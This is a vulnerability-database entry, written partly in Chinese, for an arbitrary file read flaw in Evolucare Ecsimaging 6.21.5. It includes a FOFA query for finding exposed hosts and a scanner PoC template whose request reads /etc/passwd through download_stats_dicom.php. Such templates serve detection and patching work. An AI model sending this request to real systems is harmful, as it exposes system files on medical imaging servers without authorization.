evolucare-ecsimaging-download-stats-dicom-anyfile-read: Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞

2025-08-01 Evolucare Ecsimaging PoC Public

Description

Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.漏洞影响:EVOLUCARE Evolucare Ecsimaging 6.21.5

fofa: body="ECSimaging"

PoC

id: evolucare-ecsimaging-download-stats-dicom-anyfile-read

info:
  name: Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞
  author: daffainfo
  severity: critical
  verified: false
  description: |-
    Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.漏洞影响:EVOLUCARE Evolucare Ecsimaging 6.21.5
    fofa: body="ECSimaging"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Evolucare%20Ecsimaging%20download_stats_dicom.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: evolucare,ecsimaging,file-read
  created: 2023/11/14

rules:
  r0:
    request:
      method: GET
      path: /download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities